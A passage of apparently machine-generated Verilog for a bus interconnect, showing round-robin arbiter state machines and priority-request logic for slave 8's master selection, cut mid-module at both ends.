                        s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[6] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[7] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[0] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[1] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[2] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant4:
        begin
            if (  !( s8_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[5] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[6] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[7] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[0] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[1] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[2] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[3] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant5:
        begin
            if (  !( s8_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[6] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[7] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[0] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[1] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[2] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[3] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[4] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant6:
        begin
            if (  !( s8_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[7] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[0] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[1] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[2] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[3] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[4] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[5] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb0_grant7:
        begin
            if (  !( s8_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s8_msel_arb0_req[0] ) 
                begin
                    s8_msel_arb0_next_state = s8_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s8_msel_arb0_req[1] ) 
                    begin
                        s8_msel_arb0_next_state = s8_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s8_msel_arb0_req[2] ) 
                        begin
                            s8_msel_arb0_next_state = s8_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s8_msel_arb0_req[3] ) 
                            begin
                                s8_msel_arb0_next_state = s8_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s8_msel_arb0_req[4] ) 
                                begin
                                    s8_msel_arb0_next_state = s8_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb0_req[5] ) 
                                    begin
                                        s8_msel_arb0_next_state = s8_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb0_req[6] ) 
                                        begin
                                            s8_msel_arb0_next_state = s8_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s8_msel_arb1_req = { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd1 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd1 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd1 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd1 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd1 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd1 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd1 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s8_msel_arb1_state <= s8_msel_arb1_grant0;
        end
        else
        begin 
            s8_msel_arb1_state <= s8_msel_arb1_next_state;
        end
    end
    always @ (  s8_msel_arb1_state or  { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd1 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd1 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd1 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd1 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd1 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd1 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd1 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s8_msel_arb1_next_state = s8_msel_arb1_state;
        case ( s8_msel_arb1_state ) 
        s8_msel_arb1_grant0:
        begin
            if (  !( s8_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[1] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[2] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[3] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[4] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[5] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[6] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[7] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant1:
        begin
            if (  !( s8_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[2] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[3] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[4] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[5] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[6] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[7] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[0] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant2:
        begin
            if (  !( s8_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[3] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[4] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[5] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[6] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[7] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[0] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[1] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant3:
        begin
            if (  !( s8_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[4] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[5] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[6] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[7] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[0] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[1] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[2] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant4:
        begin
            if (  !( s8_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[5] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[6] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[7] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[0] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[1] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[2] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[3] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant5:
        begin
            if (  !( s8_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[6] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[7] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[0] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[1] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[2] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[3] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[4] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant6:
        begin
            if (  !( s8_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[7] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[0] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[1] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[2] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[3] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[4] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[5] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb1_grant7:
        begin
            if (  !( s8_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s8_msel_arb1_req[0] ) 
                begin
                    s8_msel_arb1_next_state = s8_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s8_msel_arb1_req[1] ) 
                    begin
                        s8_msel_arb1_next_state = s8_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s8_msel_arb1_req[2] ) 
                        begin
                            s8_msel_arb1_next_state = s8_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s8_msel_arb1_req[3] ) 
                            begin
                                s8_msel_arb1_next_state = s8_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s8_msel_arb1_req[4] ) 
                                begin
                                    s8_msel_arb1_next_state = s8_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb1_req[5] ) 
                                    begin
                                        s8_msel_arb1_next_state = s8_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb1_req[6] ) 
                                        begin
                                            s8_msel_arb1_next_state = s8_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s8_msel_arb2_req = { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd2 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd2 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd2 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd2 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd2 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd2 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd2 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s8_msel_arb2_state <= s8_msel_arb2_grant0;
        end
        else
        begin 
            s8_msel_arb2_state <= s8_msel_arb2_next_state;
        end
    end
    always @ (  s8_msel_arb2_state or  { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd2 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd2 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd2 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd2 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd2 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd2 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd2 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s8_msel_arb2_next_state = s8_msel_arb2_state;
        case ( s8_msel_arb2_state ) 
        s8_msel_arb2_grant0:
        begin
            if (  !( s8_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[1] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[2] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[3] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[4] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[5] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[6] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[7] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant1:
        begin
            if (  !( s8_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[2] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[3] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[4] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[5] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[6] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[7] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[0] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant2:
        begin
            if (  !( s8_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[3] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[4] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[5] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[6] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[7] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[0] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[1] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant3:
        begin
            if (  !( s8_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[4] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[5] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[6] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[7] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[0] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[1] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[2] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant4:
        begin
            if (  !( s8_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[5] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                end
                else
                begin 
